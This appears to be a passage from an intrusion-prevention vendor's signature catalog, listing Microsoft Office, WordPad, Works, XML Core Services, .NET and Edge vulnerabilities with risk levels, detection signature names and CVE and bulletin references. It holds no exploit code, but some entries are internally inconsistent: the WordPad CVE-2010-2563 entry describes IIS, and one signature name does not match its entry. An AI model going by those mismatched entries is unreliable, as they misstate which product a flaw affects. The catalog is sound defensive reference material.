Microsoft Office

Type:

Buffer Overflow

Description:

There is a memory corruption vulnerability in Microsoft Word.

Situation:

E-Mail_BS-Microsoft-Word-RTF-Parsing-Buffer-Overflow-CVE-2010-1902
HTTP_SS-Microsoft-Word-RTF-Parsing-Buffer-Overflow-CVE-2010-1902
File-RTF_Microsoft-Word-RTF-Parsing-Buffer-Overflow-CVE-2010-1902

References:

CVE-2010-1902
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1902

MS10-056
http://technet.microsoft.com/security/bulletin/MS10-056

Microsoft-Word-RTF-Parsing-Engine-Memory-Corruption-CVE-2010-1901

About this vulnerability:

A memory corruption vulnerability in Microsoft Word

Risk:

High

First detected in:

sgpkg-ips-328-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Word.

Situation:

E-Mail_BS-Microsoft-Word-RTF-Parsing-Engine-Memory-Corruption-CVE-2010-1901
HTTP_SS-Microsoft-Word-RTF-Parsing-Engine-Memory-Corruption-CVE-2010-1901
File-RTF_Microsoft-Word-RTF-Parsing-Engine-Memory-Corruption-CVE-2010-1901

References:

CVE-2010-1901
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1901

MS10-056
http://technet.microsoft.com/security/bulletin/MS10-056

Microsoft-Word-RTF-Parsing-Stack-Exhaustion

About this vulnerability:	A RTF parsing denial of service vulnerability in Microsoft Word
Risk:	Moderate
First detected in:	sgpkg-ips-583-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Microsoft Word
Type:	Misconfiguration
Description:	A vulnerability exists in Microsoft Word allowing an attacker to cause denial of service via malformed tables.
Situation:	SMTP_Microsoft-Word-RTF-Parsing-Stack-Exhaustion File-RTF_Microsoft-Word-RTF-Parsing-Stack-Exhaustion

Microsoft-Word-RTF-Remote-Code-Execution-CVE-2014-1761

About this vulnerability:

A vulnerability in Microsoft Word

Risk:

Moderate

First detected in:

sgpkg-ips-572-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Word; Microsoft Word 2003; Microsoft Word 2007; Microsoft Word 2010; Microsoft Word 2013

Type:

Malfunction

Description:

There is a remote code execution in Microsoft Word 2010 related to parsing RTF files.

Situation:

File-Text_Microsoft-Word-RTF-Remote-Code-Execution-CVE-2014-1761
File-Text_Word-RTF-Listoverridecount-RCE-Multiple-Vulnerabilities
File-RTF_Word-RTF-Listoverridecount-RCE-Multiple-Vulnerabilities
File-RTF_Microsoft-Word-RTF-Remote-Code-Execution-CVE-2014-1761

References:

CVE-2014-1761
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1761

BID-66385
http://www.securityfocus.com/bid/66385

OSVDB-104895
http://www.osvdb.org/104895

Microsoft-Word-RTF-RTF-Object-Parsing-Memory-Corruption

About this vulnerability:

A RTF parsing memory corruption vulnerability in Microsoft Word

Risk:

Moderate

First detected in:

sgpkg-ips-582-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Word

Type:

Misconfiguration

Description:

A vulnerability exists in Microsoft Word allowing an attacker to cause memory corruption via maliciously crafted RTF files.

Situation:

File-RTF_Microsoft-Word-RTF-Object-Parsing-Memory-Corruption

References:

CVE-2008-4027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4027

MS08-072
http://technet.microsoft.com/security/bulletin/MS08-072

Microsoft-Word-Security-Feature-Bypass-CVE-2024-49033

About this vulnerability:

A vulnerability in Microsoft Word

Risk:

High

First detected in:

sgpkg-ips-1798-5242

Last changed:

sgpkg-ips-1798-5242

Platform:

Windows

Software:

Microsoft Word

Type:

Malfunction

Description:

A security feature bypass vulnerability has been reported in Microsoft Word.

Situation:

File-Text_Microsoft-Word-Security-Feature-Bypass-CVE-2024-49033

References:

CVE-2024-49033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49033

ms24-nov
http://technet.microsoft.com/security/bulletin/ms24-nov

Microsoft-Word-Sprmsdyatop-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Word

Risk:

Moderate

First detected in:

sgpkg-ips-791-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Word

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Word detected

Situation:

File-OLE_Microsoft-Word-Sprmsdyatop-Memory-Corruption

References:

CVE-2016-3316
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3316

MS16-099
http://technet.microsoft.com/security/bulletin/MS16-099

Microsoft-Word-Use-After-Free-CVE-2011-1983

About this vulnerability:

A vulnerability in Microsoft Word

Risk:

High

First detected in:

sgpkg-ips-428-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Mac OS X

Software:

Microsoft Office 2007; Microsoft Office 2010; Microsoft Office 2011

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Word.

Situation:

File-TextId_Microsoft-Word-Use-After-Free-CVE-2011-1983

References:

CVE-2011-1983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1983

BID-50956
http://www.securityfocus.com/bid/50956

OSVDB-77659
http://www.osvdb.org/77659

MS11-089
http://technet.microsoft.com/security/bulletin/MS11-089

Microsoft-WordPad-Embedded-COM-Code-Execution

About this vulnerability:	Vulnerable COM-object in WordPad document
Risk:	Moderate
First detected in:	sgpkg-ips-584-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	WordPad
Type:	Code Injection
Description:	A vulnerability exists in Microsoft WordPad allowing an attacker to cause execute arbitrary code via maliciously embedded COM-objects.
Situation:	File-RTF_Microsoft-WordPad-Embedded-COM-Code-Execution

Microsoft-WordPad-Text-Converter-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft WordPad

Risk:

High

First detected in:

sgpkg-ips-376-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

WordPad

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Microsoft WordPad. The vulnerability is due to an error while WordPad Text Converter processes data in a specially crafted Word 97 document. Remote attackers can exploit this vulnerability by enticing a target user to open a malicious Word 97 document, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behavior of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access.

Situation:

HTTP_SS-Microsoft-WordPad-Text-Converter-Buffer-Overflow
File-OLE_Microsoft-WordPad-Text-Converter-Buffer-Overflow

References:

CVE-2010-2563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2563

BID-43122
http://www.securityfocus.com/bid/43122

MS10-067
http://technet.microsoft.com/security/bulletin/MS10-067

Microsoft-WordPad-Text-Converter-CVE-2010-2563

About this vulnerability:

A vulnerability in Microsoft WordPad

Risk:

High

First detected in:

sgpkg-ips-342-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003

Software:

WordPad

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Information Services (IIS).

Situation:

HTTP_SS-Microsoft-WordPad-Text-Converter-CVE-2010-2563
File-OLE_Microsoft-WordPad-Text-Converter-CVE-2010-2563

References:

CVE-2010-2563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2563

MS10-067
http://technet.microsoft.com/security/bulletin/MS10-067

Microsoft-WordPad-Word-Converter-Xst-Structure-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Word 8 converter shipped with the Microsoft Windows family of operating systems. The flaw is due to a boundary error when processing a crafted Word document file. A remote attacker can exploit this vulnerability by enticing the target user to open a specially crafted Word 97 document with an affected version of WordPad. Successful exploitation can lead to arbitrary code execution within the security context of the currently logged on user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, affected product will terminate resulting in the loss of any unsaved data from the current session.

Situation:

File-OLE_Microsoft-WordPad-Word-Converter-Xst-Structure-Buffer-Overflow

References:

CVE-2008-4841
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4841

BID-32718
http://www.securityfocus.com/bid/32718

MS09-010
http://technet.microsoft.com/security/bulletin/MS09-010

Microsoft-Wordperfect-5.x-Converter-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office; Microsoft Works

Type:

Buffer Overflow

Description:

There is a vulnerability in the WordPerfect 5.x converter module used by several Microsoft products. The vulnerability is triggered by a WordPerfect document with an overly long length field. This vulnerability could permit an attacker to inject and execute code on a remote system with the security context of the current user. In a simple attack against this vulnerability, the application that uses the vulnerable data converter will terminate on a memory access violation error. In most cases the "Program error" popup dialog will be displayed saying that the application has generated errors and will be closed by Windows. However, depending on the actual error and the application targeted, the application may terminate without user notification. In case of a more sophisticated attack against this vulnerability, arbitrary code may be injected into the application and executed. In this case, the behaviour of the attack target will depend on the nature of the injected code.

Situation:

File-Binary_Microsoft-Wordperfect-5.x-Converter-Buffer-Overflow

References:

CVE-2004-0573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0573

BID-11172
http://www.securityfocus.com/bid/11172

MS04-027
http://technet.microsoft.com/security/bulletin/MS04-027

Microsoft-Works-File-Converter-WPS-File-Field-Length-Stack-Overflow

About this vulnerability:

A stack overflow vulnerability in Microsoft Works

Risk:

High

First detected in:

sgpkg-ips-250-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Works

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Works. In particular, a file converter handling WPS files does not perform sufficient validation of the various fields in the input file. A remote attacker can exploit this vulnerability by enticing the target user to open maliciously constructed files, potentially causing arbitrary code to be injected and executed in the security context of the logged-in user.

Situation:

HTTP_SS-Microsoft-Works-File-Converter-WPS-File-Field-Length-Stack-Overflow
File-OLE_Microsoft-Works-File-Converter-WPS-File-Field-Length-Stack-Overflow

References:

CVE-2008-0108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0108

BID-27659
http://www.securityfocus.com/bid/27659

MS08-011
http://technet.microsoft.com/security/bulletin/MS08-011

Microsoft-Works-File-Converter-WPS-FileSectionHeaderIndexTable-StackOF

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-384-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office; Microsoft Works

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Microsoft Works File Converter. The vulnerability is due to insufficient input validation of section header index table while handling WPS files. A remote attacker can exploit this vulnerability by enticing the target user to open maliciously constructed files, potentially causing arbitrary code to be injected and executed in the security context of the logged-in user.

Situation:

HTTP_SS-Microsoft-Works-File-Converter-WPS-FileSectionHeaderIndexTable-StackOF
File-OLE_Microsoft-Works-File-Converter-WPS-FileSectionHeaderIndexTable-StackOF

References:

CVE-2008-0105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0105

BID-27658
http://www.securityfocus.com/bid/27658

MS08-011
http://technet.microsoft.com/security/bulletin/MS08-011

Microsoft-Works-FileConverter-WPS-FileSectionLengthHeaders-MemCorrupt

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-384-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office; Microsoft Works

Type:

Malfunction

Description:

There exists a buffer overflow vulnerability in Microsoft Works File Converter. The vulnerability is due to improper validation of various lengths in WPS document. A remote attacker can exploit this vulnerability by enticing the target user to open a maliciously constructed WPS document, potentially causing arbitrary code to be injected and executed in the security context of the logged-in user.

Situation:

HTTP_SS-Microsoft-Works-FileConverter-WPS-FileSectionLengthHeaders-MemCorrupt
File-OLE_Microsoft-Works-FileConverter-WPS-FileSectionLengthHeaders-MemCorrupt

References:

CVE-2007-0216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0216

BID-27657
http://www.securityfocus.com/bid/27657

MS08-011
http://technet.microsoft.com/security/bulletin/MS08-011

Microsoft-Works-WkImgSrv.dll-ActiveX-Vulnerability

About this vulnerability:

Microsoft Works WkImgSrv.dll ActiveX Vulnerability

Risk:

Low

First detected in:

sgpkg-ips-633-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Microsoft Works; Microsoft Office 2003; Microsoft Office 2007

Type:

Malfunction

Description:

A vulnerability exists in an ActiveX control in WkImgSrv.dll 7.03.0616.0 which allows a remote attacker to execute arbitrary code or cause a denial of service.

Situation:

File-Text_Microsoft-Works-WkImgSrv.dll-ActiveX-Vulnerability

References:

CVE-2008-1898
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1898

BID-28820
http://www.securityfocus.com/bid/28820

OSVDB-44458
http://www.osvdb.org/44458

Microsoft-WPAD-Proxy-Discovery-Privilege-Escalation

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-774-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Server

Type:

Malfunction

Description:

A vulnerbility in Microsoft Windows Server, versions 7, 8.1, 10, RT 8.1, Vista; 2008, 2008 R2, 2012, 2012 R2, In Web Proxy Automatic Discovery (WPAD), which allows remote attackers to bypass security and elevate privileges by responding to a NetBios name request.

Situation:

Generic_UDP-Microsoft-WPAD-Proxy-Discovery-Privilege-Escalation

References:

CVE-2016-3213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3213

MS16-077
http://technet.microsoft.com/security/bulletin/MS16-077

Microsoft-WPS-Converter-Heap-Overflow-Vulnerability

About this vulnerability:

An attempt to exploit Microsoft Office vulnerability CVE-2012-0177

Risk:

Moderate

First detected in:

sgpkg-ips-446-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office; Microsoft Works

Type:

Buffer Overflow

Description:

An attempt to exploit Microsoft Office vulnerability CVE-2012-0177

Situation:

File-OLE_Microsoft-WPS-Converter-Heap-Overflow-Vulnerability

References:

CVE-2012-0177
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0177

BID-52867
http://www.securityfocus.com/bid/52867

OSVDB-81134
http://www.osvdb.org/81134

MS12-028
http://technet.microsoft.com/security/bulletin/MS12-028

Microsoft-WSDAPI-Memory-Corruption-MS09-063

About this vulnerability:

A vulnerability in Microsoft Web Services on Devices API

Risk:

High

First detected in:

sgpkg-ips-264-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 2008

Software:

<os>

Type:

Buffer Overflow

Description:

There is a remote code execution vulnerability in Microsoft Web Services on Devices API (WSDAPI).

Situation:

HTTP_CSH-Microsoft-WSDAPI-Memory-Corruption-MS09-063
Generic_CS-Microsoft-WSDAPI-Memory-Corruption-MS09-063

References:

CVE-2009-2512
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2512

BID-36919
http://www.securityfocus.com/bid/36919

MS09-063
http://technet.microsoft.com/security/bulletin/MS09-063

Microsoft-XML-Core-Services-Content-Parsing-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-617-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft XML Core Services. The vulnerability is due to the way Microsoft XML Core Services improperly parses XML content. A remote unauthenticated attacker could exploit this vulnerability by enticing a target user to visit a specially crafted website. Successful exploitation could allow arbitrary code execution in the context of current user.

Situation:

File-TextId_Microsoft-XML-Core-Services-Content-Parsing-Memory-Corruption

References:

CVE-2014-4118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4118

BID-70957
http://www.securityfocus.com/bid/70957

OSVDB-114531
http://www.osvdb.org/114531

MS14-067
http://technet.microsoft.com/security/bulletin/MS14-067

Microsoft-XML-Core-Services-CVE-2017-0024

About this vulnerability:

A vulnerability in Microsoft XML Core Services

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft XML Core Services

Situation:

File-Text_Microsoft-XML-Core-Services-CVE-2017-0024

References:

CVE-2017-0022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0022

MS17-014
http://technet.microsoft.com/security/bulletin/MS17-014

Microsoft-Xml-Core-Services-Integer-Truncation-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft XML Core Services

Risk:

High

First detected in:

sgpkg-ips-511-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft XML Core Services

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft XML Core Services. The vulnerability is due to an integer truncation error while Microsoft XML Core Services parses XML content. Remote attackers could exploit this vulnerability by persuading a target user to visit a specially crafted website. Successful exploitation could allow arbitrary code execution in the context of current user.

Situation:

File-Text_Microsoft-Xml-Core-Services-Vulnerable-ActiveX-Control

References:

CVE-2013-0006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0006

BID-57116
http://www.securityfocus.com/bid/57116

OSVDB-88959
http://www.osvdb.org/88959

MS13-002
http://technet.microsoft.com/security/bulletin/MS13-002

Microsoft-XML-Core-Services-Memory-Corruption-CVE-2010-2561

About this vulnerability:

A memory corruption vulnerability in Microsoft XML Core Services

Risk:

Critical

First detected in:

sgpkg-ips-331-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft XML Core Services. By enticing a target user to visit a malicious web page, an attacker can execute arbitrary code with the privileges of the logged in user.

Situation:

HTTP_SS-Core-Services-Memory-Corruption-CVE-2010-2561
HTTP_SHS-Core-Services-Memory-Corruption-CVE-2010-2561

References:

CVE-2010-2561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2561

BID-42300
http://www.securityfocus.com/bid/42300

MS10-051
http://technet.microsoft.com/security/bulletin/MS10-051

Microsoft-Xml-Core-Services-Msxml-Header-Request-Information-Disclosure

About this vulnerability:

An information disclosure vulnerability in Microsoft Microsoft XML Core Services

Risk:

Moderate

First detected in:

sgpkg-ips-187-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft XML Core Services

Type:

Malfunction

Description:

There is an information disclosure vulnerability in the Microsoft XML Core Services component. The vulnerability is due to a failure in the functionality of same origin policy. The component handles certain request headers incorrectly. Remote attackers can exploit this vulnerability by persuading target users to visit a specially-crafted web page. Successful exploitation may allow the attackers to access the contents of a web page belonging to a different domain and cause information disclosure.

Situation:

HTTP_CS-Microsoft-Xml-Core-Services-Msxml-Header-Request-Information-Disclosure
HTTP_SS-Microsoft-Xml-Core-Services-Msxml-Header-Request-Information-Disclosure
File-Text_Microsoft-Xml-Core-Services-Msxml-Header-Information-Disclosure

References:

CVE-2008-4033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4033

BID-32204
http://www.securityfocus.com/bid/32204

MS08-069
http://technet.microsoft.com/security/bulletin/MS08-069

Microsoft-Xml-Core-Services-ParseError-DOM-Object-Information-Disclosure

About this vulnerability:

An information disclosure vulnerability in Microsoft XML Core Services

Risk:

Moderate

First detected in:

sgpkg-ips-186-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft XML Core Services

Type:

Input Validation

Description:

There is an information disclosure vulnerability in Microsoft XML Core Services. The vulnerability is caused by a design flaw in the way Microsoft XML Core Services handle error checks for external XML Document Type Definition (DTD) files. Remote attackers can exploit this vulnerability by persuading target users to visit a specially-crafted web page. Successful exploitation may allow the attackers to access contents of a web page belonging to a different domain and cause the information disclosure.

Situation:

HTTP_SS-Microsoft-Xml-Core-Services-ParseError-DOM-Object-Information-Disclosure
File-Text_Microsoft-Xml-Core-Services-ParseError-DOM-Object-Disclosure

References:

CVE-2008-4029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4029

BID-32155
http://www.securityfocus.com/bid/32155

MS08-069
http://technet.microsoft.com/security/bulletin/MS08-069

Microsoft-Xml-Core-Services-Remote-Code-Execution-Vulnerability

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft XML Core Services detected

Risk:

High

First detected in:

sgpkg-ips-458-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft XML Core Services;Internet Explorer

Type:

Malfunction

Description:

There is a vulnerability in Microsoft XML Core Services that could allow remote code execution.

Situation:

File-Text_Microsoft-Xml-Core-Services-Remote-Code-Execution-Vulnerability

References:

CVE-2012-1889
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1889

BID-53934
http://www.securityfocus.com/bid/53934

OSVDB-82873
http://www.osvdb.org/82873

MS12-043
http://technet.microsoft.com/security/bulletin/MS12-043

Microsoft-XML-Editor-External-Entities-Resolution-CVE-2011-1280

About this vulnerability:

A vulnerability in Microsoft XML Editor

Risk:

High

First detected in:

sgpkg-ips-396-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft InfoPath 2007; Microsoft SQL Server 2005; Microsoft SQL Server 2008; Microsoft Visual Studio 2008

Type:

Input Validation

Description:

There is a vulnerability in Microsoft XML Editor.

Situation:

HTTP_SS-Microsoft-XML-Editor-External-Entities-Resolution-CVE-2011-1280
File-TextId_Microsoft-XML-Editor-External-Entities-Resolution-CVE-2011-1280

References:

CVE-2011-1280
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1280

BID-48196
http://www.securityfocus.com/bid/48196

MS11-049
http://technet.microsoft.com/security/bulletin/MS11-049

Microsoft-XMLHTTP-ActiveX-Control-Code-Execution

About this vulnerability:

Code execution vulnerability in the XMLHTTP ActiveX Control included with Microsoft XML Core Services

Risk:

High

First detected in:

sgpkg-ips-173-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft XML Core Services

Type:

Malfunction

Description:

There is a code execution vulnerability in the XMLHTTP ActiveX Control included with Microsoft XML Core Services. A remote attacker can exploit the vulnerability by enticing a user to visit a malicious web page with a vulnerable version of the affected product installed to execute non-privileged arbitrary code on the user's system.

Situation:

HTTP_SS-Microsoft-XMLHTTP-ActiveX-Control-Code-Execution

References:

CVE-2006-5745
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5745

BID-20915
http://www.securityfocus.com/bid/20915

MS06-071
http://technet.microsoft.com/security/bulletin/MS06-071

Microsoft.NET-Iriparsing-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

Moderate

First detected in:

sgpkg-ips-613-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Buffer Overflow

Description:

A remote code execution vulnerability exists in Microsoft .NET Framework. The vulnerability is due to the way that internationalized resource identifiers (Iri) is processed. A remote attacker could exploit this vulnerability by sending a malicious request to the target server. Successful exploitation could result in arbitrary code execution in the security context in which the .NET application runs.

Situation:

HTTP_CRL-Microsoft.NET-Iriparsing-Remote-Code-Execution

References:

CVE-2014-4121
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4121

BID-70351
http://www.securityfocus.com/bid/70351

OSVDB-113185
http://www.osvdb.org/113185

MS14-057
http://technet.microsoft.com/security/bulletin/MS14-057

Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0810

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1149-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0810

References:

CVE-2019-0810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0810

ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr

Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0812

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1149-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0812

References:

CVE-2019-0812
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0812

ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr

Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0860

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1149-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0860

References:

CVE-2019-0860
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0860

ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr

Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0592

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1143-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists an out of bound vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0592

References:

CVE-2019-0592
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0592

ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar

Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0770

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1143-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists an out of bound vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0770

References:

CVE-2019-0770
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0770

ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar

Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0771

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1143-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists an out of bound vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0771

References:

CVE-2019-0771
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0771

ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar

Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0990

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1168-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists an out of bound vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0990

References:

CVE-2019-0990
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0990

ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun

Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-1002

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1168-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists an out of bound vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-1002

References:

CVE-2019-1002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1002

ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun

Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-1023

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1168-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists an out of bound vulnerability in Microsoft Edge. Successful exploitation of this issue can result in information disclosure.

Situation:

File-Text_Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-1023

References:

CVE-2019-1023
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1023

ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun

Microsoft_Edge_Security_Bypass_Vulnerability_CVE-2019-0612

